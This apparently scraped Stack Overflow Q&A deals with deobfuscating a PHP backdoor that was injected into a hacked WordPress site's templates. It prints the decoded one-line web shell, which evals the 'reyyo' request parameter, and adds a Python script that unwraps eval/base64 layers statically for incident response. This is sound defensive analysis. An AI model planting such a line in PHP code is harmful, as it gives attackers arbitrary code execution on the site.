Question

One of my friends' WordPress websites was hacked by someone, and they put the following code in the header of all template files.

http://pastebin.com/dYcQ1Gri

I tried to decode it with a base64 decoder, but the output looks odd. Can you guys tell me what type of encoding this is?


Solution

It's a series of eval+base64 encryption. After decoding, the code would be:

if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))
    eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));

Here's how I got that:

  • Copy the entire code into your text editor
  • Supply \/\*.*?\*\/ as the search pattern, and replace with '' (empty string)
  • Now you'll get one or more eval() statements. Change them to echo.
  • Repeat

Basically this code will allow the attacker to inject and execute arbitrary code on your website.

OTHER TIPS

Easiest way to do this is to remove all comments (/* */) with regex, and then replace eval() with echo(). Rinse and repeat.

After two or three loops, it outputs the following:

if(isset($_REQUEST['r'.'e'.'y'.'yo']))eval(stripslashes($_REQUEST['r'.'e'.'y'.'y'.'o']));

Which means that it will eval() anything passed as reyyo in either $_GET, $_POST or $_COOKIE.
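The manual loop both answers describe (strip the /* */ comments, unwrap the eval layer, repeat) can be done statically so that none of the attacker's code is ever executed. The script below is an added example, not code from the question's pastebin or from either answer: it builds a constructed two-layer sample around the decoded payload quoted above, peels eval(base64_decode(...)) and eval(gzinflate(base64_decode(...))) layers with regular expressions, and then folds the 'r' . 'e' . 'y' . 'yo' concatenation so the request parameter the backdoor listens on can be read plainly. The names unwrap, fold_concat and request_keys, and the sample layers, are my own assumptions for this illustration.

```python
import base64
import re
import zlib

# Constructed sample: the decoded payload quoted in the answers, wrapped here in
# two eval(base64_decode(...)) layers with junk /* */ comments so the example
# runs offline. This is NOT the content of the pastebin from the question.
PAYLOAD = ("if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))"
           " eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));")


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


def _deflate(s: str) -> bytes:
    # Raw DEFLATE stream (no zlib header), which is what PHP's gzinflate() expects.
    c = zlib.compressobj(wbits=-15)
    return c.compress(s.encode()) + c.flush()


LAYER1 = "/*k1*/eval(/*k2*/base64_decode(/*k3*/'" + _b64(PAYLOAD) + "'/*k4*/));"
LAYER2 = ("<?php /*junk*/ eval(gzinflate(base64_decode(\""
          + base64.b64encode(_deflate(LAYER1)).decode() + "\")));/*end*/ ?>")

# Same pattern the answers use to delete /* ... */ comments.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# eval( [gzinflate(] base64_decode( '<blob>' ) [)] ) ;
EVAL_RE = re.compile(
    r"eval\s*\(\s*(gzinflate\s*\(\s*)?base64_decode\s*\(\s*"
    r"['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*(\))?\s*\)\s*;?",
    re.S,
)


def unwrap(code: str, max_layers: int = 20):
    """Statically peel eval(base64_decode(...)) layers without running any PHP.
    Returns (final_code, number_of_layers_removed)."""
    layers = 0
    while layers < max_layers:
        code = COMMENT_RE.sub("", code)          # step 1: drop the comment noise
        m = EVAL_RE.search(code)                 # step 2: find the eval wrapper
        if not m:
            break
        inflate, blob, _ = m.groups()
        data = base64.b64decode(re.sub(r"\s+", "", blob))
        if inflate:                              # gzinflate() == raw DEFLATE
            data = zlib.decompress(data, -15)
        # Splice the decoded text in place of the eval(...) call, like echo would.
        code = code[:m.start()] + data.decode("utf-8", "replace") + code[m.end():]
        layers += 1
    return code.strip(), layers


CONCAT_RE = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")


def fold_concat(code: str) -> str:
    """Join 'a' . 'b' . 'c' literals so split-up names such as 'reyyo' read plainly."""
    prev = None
    while prev != code:
        prev, code = code, CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", code)
    return code


REQUEST_RE = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[\s*'([^']*)'\s*\]")


def request_keys(code: str):
    """Parameter names the decoded code reads from user input (sorted, unique).
    These are the values worth searching for in the web server's access logs."""
    return sorted(set(REQUEST_RE.findall(fold_concat(code))))


if __name__ == "__main__":
    code, n = unwrap(LAYER2)
    print(f"{n} layer(s) removed:\n{code}")
    print("user-controlled keys fed to eval():", request_keys(code))
```

Running the script on the constructed sample removes two layers and reports reyyo as the only request key; pointing unwrap() at a real infected template gives you the same result the answers reached by hand, and request_keys() tells you which parameter to look for in access logs when checking whether the backdoor was actually used.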

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow